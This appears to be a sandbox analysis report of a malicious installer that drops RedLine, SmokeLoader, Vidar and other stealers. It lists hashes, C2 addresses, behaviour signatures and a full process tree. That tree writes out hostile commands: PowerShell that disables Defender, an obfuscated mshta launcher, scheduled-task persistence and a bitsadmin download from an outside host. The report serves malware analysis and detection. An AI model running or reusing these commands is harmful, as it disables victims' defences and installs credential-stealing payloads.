Resubmissions

02-11-2021 06:54

211102-hpn1zsbhc2 10

02-11-2021 06:42

211102-hgpmjsgggp 10

01-11-2021 21:47

211101-1ncknsfgfm 10

Analysis

  • max time kernel
    1329s
  • max time network
    24156s
  • platform
    windows10_x64
  • resource
    win10-de-20210920
  • submitted
    01-11-2021 21:47

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    b5b5fe52ed9ca7d47bfb857498fd684c

  • SHA1

    9c17089a630141c9b4e13ef46ab334d46709fdb8

  • SHA256

    6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

  • SHA512

    482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a

Malware Config

Extracted

Family

redline

Botnet

media0121

C2

91.121.67.60:23325

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies system executable filetype association 2 TTPs 3 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata: ET MALWARE FormBook CnC Checkin (POST) M2

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 49 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 41 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Kills process with taskkill 11 IoCs
  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1084
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1320
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:1584
        • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
          "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\setup_install.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\setup_install.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3988
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:408
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1656
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3680
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:772
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1808
                • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17870faab0.exe
                  Mon17870faab0.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2068
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    7⤵
                      PID:4520
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        8⤵
                        • Kills process with taskkill
                        PID:5660
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
                  5⤵
                    PID:1344
                    • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17bffc2992eb3d.exe
                      Mon17bffc2992eb3d.exe /mixone
                      6⤵
                      • Executes dropped EXE
                      PID:3204
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 660
                        7⤵
                        • Executes dropped EXE
                        • Program crash
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:804
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 680
                        7⤵
                        • Program crash
                        PID:1476
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 644
                        7⤵
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4620
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 500
                        7⤵
                        • Program crash
                        PID:4424
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 884
                        7⤵
                        • Program crash
                        PID:5972
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 932
                        7⤵
                        • Program crash
                        PID:5520
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 1096
                        7⤵
                        • Suspicious use of NtCreateProcessExOtherParentProcess
                        • Program crash
                        PID:5144
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1444
                    • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon173a360b525.exe
                      Mon173a360b525.exe
                      6⤵
                      • Executes dropped EXE
                      PID:2944
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5995050942.exe"
                        7⤵
                          PID:400
                          • C:\Users\Admin\AppData\Local\Temp\5995050942.exe
                            "C:\Users\Admin\AppData\Local\Temp\5995050942.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:5040
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4207775011.exe"
                          7⤵
                            PID:5420
                            • C:\Users\Admin\AppData\Local\Temp\4207775011.exe
                              "C:\Users\Admin\AppData\Local\Temp\4207775011.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:5136
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon173a360b525.exe" & exit
                            7⤵
                              PID:7624
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im "Mon173a360b525.exe" /f
                                8⤵
                                • Kills process with taskkill
                                PID:7680
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1360
                          • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon175e6c8b40064b8c8.exe
                            Mon175e6c8b40064b8c8.exe
                            6⤵
                            • Executes dropped EXE
                            PID:2696
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1936
                          • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon178e7a516181.exe
                            Mon178e7a516181.exe
                            6⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:1948
                            • C:\Users\Admin\Pictures\Adobe Films\XFVlvfDh6q0ZrBQPnyD1X531.exe
                              "C:\Users\Admin\Pictures\Adobe Films\XFVlvfDh6q0ZrBQPnyD1X531.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:2368
                            • C:\Users\Admin\Pictures\Adobe Films\8PbSW2I9Hfh48MZXl15fmd0A.exe
                              "C:\Users\Admin\Pictures\Adobe Films\8PbSW2I9Hfh48MZXl15fmd0A.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:1436
                            • C:\Users\Admin\Pictures\Adobe Films\0XZG98DDeLGyuqc_Bf74dbFG.exe
                              "C:\Users\Admin\Pictures\Adobe Films\0XZG98DDeLGyuqc_Bf74dbFG.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:5512
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                8⤵
                                • Creates scheduled task(s)
                                PID:6260
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                8⤵
                                • Creates scheduled task(s)
                                PID:7096
                              • C:\Users\Admin\Documents\ALCF9kCWyiEEXjQ5JQ3TDC9N.exe
                                "C:\Users\Admin\Documents\ALCF9kCWyiEEXjQ5JQ3TDC9N.exe"
                                8⤵
                                • Checks computer location settings
                                PID:5684
                                • C:\Users\Admin\Pictures\Adobe Films\CIWXTsQtM3pU55l9wEuQKMSK.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\CIWXTsQtM3pU55l9wEuQKMSK.exe"
                                  9⤵
                                    PID:2812
                                  • C:\Users\Admin\Pictures\Adobe Films\nodcuSntv5XE09KkI1BVGWt_.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\nodcuSntv5XE09KkI1BVGWt_.exe"
                                    9⤵
                                      PID:4816
                                    • C:\Users\Admin\Pictures\Adobe Films\xSbMGnYdyMRHlIjfijRcR27T.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\xSbMGnYdyMRHlIjfijRcR27T.exe"
                                      9⤵
                                        PID:4528
                                      • C:\Users\Admin\Pictures\Adobe Films\NcZM9rk7eFeF4jrEXgIs5vl9.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\NcZM9rk7eFeF4jrEXgIs5vl9.exe"
                                        9⤵
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:6952
                                      • C:\Users\Admin\Pictures\Adobe Films\HAVO7E5x_BNhUcJAtGiY9mfV.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\HAVO7E5x_BNhUcJAtGiY9mfV.exe"
                                        9⤵
                                          PID:5452
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\HAVO7E5x_BNhUcJAtGiY9mfV.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\HAVO7E5x_BNhUcJAtGiY9mfV.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                            10⤵
                                              PID:6100
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\HAVO7E5x_BNhUcJAtGiY9mfV.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\HAVO7E5x_BNhUcJAtGiY9mfV.exe" ) do taskkill -f -iM "%~NxM"
                                                11⤵
                                                  PID:4184
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill -f -iM "HAVO7E5x_BNhUcJAtGiY9mfV.exe"
                                                    12⤵
                                                    • Kills process with taskkill
                                                    PID:6644
                                            • C:\Users\Admin\Pictures\Adobe Films\7yQF6ibSpjJzJIirFTv4bj_p.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\7yQF6ibSpjJzJIirFTv4bj_p.exe"
                                              9⤵
                                                PID:6656
                                                • C:\Users\Admin\Pictures\Adobe Films\7yQF6ibSpjJzJIirFTv4bj_p.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\7yQF6ibSpjJzJIirFTv4bj_p.exe" -u
                                                  10⤵
                                                  • Executes dropped EXE
                                                  PID:5096
                                              • C:\Users\Admin\Pictures\Adobe Films\DD41OuJYp0M2Os7y0u0yPflQ.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\DD41OuJYp0M2Os7y0u0yPflQ.exe"
                                                9⤵
                                                  PID:4108
                                                • C:\Users\Admin\Pictures\Adobe Films\HkhJhJR3ypACeohUmEBp6nc8.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\HkhJhJR3ypACeohUmEBp6nc8.exe"
                                                  9⤵
                                                  • Loads dropped DLL
                                                  PID:6876
                                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                    10⤵
                                                    • Loads dropped DLL
                                                    • Adds Run key to start application
                                                    PID:6944
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                      11⤵
                                                        PID:8880
                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ffef008dec0,0x7ffef008ded0,0x7ffef008dee0
                                                          12⤵
                                                            PID:8348
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff715f49e70,0x7ff715f49e80,0x7ff715f49e90
                                                              13⤵
                                                                PID:8432
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,8683234215246257884,14219695862631780507,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8880_1456172217" --mojo-platform-channel-handle=1672 /prefetch:8
                                                              12⤵
                                                                PID:8824
                                                        • C:\Users\Admin\Pictures\Adobe Films\Jsr8FWGCI3jSvbQkgGHtX9Hu.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\Jsr8FWGCI3jSvbQkgGHtX9Hu.exe"
                                                          9⤵
                                                            PID:2536
                                                            • C:\Users\Admin\AppData\Local\Temp\is-UPFO3.tmp\Jsr8FWGCI3jSvbQkgGHtX9Hu.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-UPFO3.tmp\Jsr8FWGCI3jSvbQkgGHtX9Hu.tmp" /SL5="$2044C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Jsr8FWGCI3jSvbQkgGHtX9Hu.exe"
                                                              10⤵
                                                              • Loads dropped DLL
                                                              PID:5724
                                                              • C:\Users\Admin\AppData\Local\Temp\is-NLDUG.tmp\DYbALA.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-NLDUG.tmp\DYbALA.exe" /S /UID=2709
                                                                11⤵
                                                                • Drops file in Drivers directory
                                                                PID:5912
                                                                • C:\Users\Admin\AppData\Local\Temp\05-3522e-3be-30398-190851bf47a1b\Lewyleroha.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\05-3522e-3be-30398-190851bf47a1b\Lewyleroha.exe"
                                                                  12⤵
                                                                    PID:400
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1xhrgymd.le4\GcleanerEU.exe /eufive & exit
                                                                      13⤵
                                                                        PID:5572
                                                                        • C:\Users\Admin\AppData\Local\Temp\1xhrgymd.le4\GcleanerEU.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\1xhrgymd.le4\GcleanerEU.exe /eufive
                                                                          14⤵
                                                                            PID:8108
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r5jpzkzw.i3y\installer.exe /qn CAMPAIGN="654" & exit
                                                                          13⤵
                                                                            PID:7500
                                                                            • C:\Users\Admin\AppData\Local\Temp\r5jpzkzw.i3y\installer.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\r5jpzkzw.i3y\installer.exe /qn CAMPAIGN="654"
                                                                              14⤵
                                                                              • Loads dropped DLL
                                                                              • Enumerates connected drives
                                                                              • Modifies system certificate store
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:3148
                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\r5jpzkzw.i3y\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\r5jpzkzw.i3y\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635543928 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                15⤵
                                                                                  PID:4776
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qmshbynq.wuo\any.exe & exit
                                                                              13⤵
                                                                                PID:7648
                                                                                • C:\Users\Admin\AppData\Local\Temp\qmshbynq.wuo\any.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\qmshbynq.wuo\any.exe
                                                                                  14⤵
                                                                                    PID:6228
                                                                                    • C:\Users\Admin\AppData\Local\Temp\qmshbynq.wuo\any.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\qmshbynq.wuo\any.exe" -u
                                                                                      15⤵
                                                                                        PID:7660
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dfebr4et.a5u\gcleaner.exe /mixfive & exit
                                                                                    13⤵
                                                                                      PID:7780
                                                                                      • C:\Users\Admin\AppData\Local\Temp\dfebr4et.a5u\gcleaner.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\dfebr4et.a5u\gcleaner.exe /mixfive
                                                                                        14⤵
                                                                                          PID:7416
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jiutmle.jgd\autosubplayer.exe /S & exit
                                                                                        13⤵
                                                                                          PID:7964
                                                                                          • C:\Users\Admin\AppData\Local\Temp\5jiutmle.jgd\autosubplayer.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\5jiutmle.jgd\autosubplayer.exe /S
                                                                                            14⤵
                                                                                            • Drops file in Program Files directory
                                                                                            PID:6400
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl30F3.tmp\tempfile.ps1"
                                                                                              15⤵
                                                                                                PID:8760
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl30F3.tmp\tempfile.ps1"
                                                                                                15⤵
                                                                                                  PID:912
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    16⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:880
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl30F3.tmp\tempfile.ps1"
                                                                                                  15⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:7084
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl30F3.tmp\tempfile.ps1"
                                                                                                  15⤵
                                                                                                    PID:8088
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      16⤵
                                                                                                        PID:7844
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl30F3.tmp\tempfile.ps1"
                                                                                                      15⤵
                                                                                                        PID:7564
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl30F3.tmp\tempfile.ps1"
                                                                                                        15⤵
                                                                                                          PID:7328
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl30F3.tmp\tempfile.ps1"
                                                                                                          15⤵
                                                                                                          • Checks for any installed AV software in registry
                                                                                                          PID:3456
                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                          "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                          15⤵
                                                                                                          • Download via BitsAdmin
                                                                                                          PID:7876
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\shEFwz3FQheeQcn13atkAIho.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\shEFwz3FQheeQcn13atkAIho.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5288
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\d3yKwY3mT_SrLNqQHQWq0Alb.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\d3yKwY3mT_SrLNqQHQWq0Alb.exe"
                                                                                          7⤵
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:5100
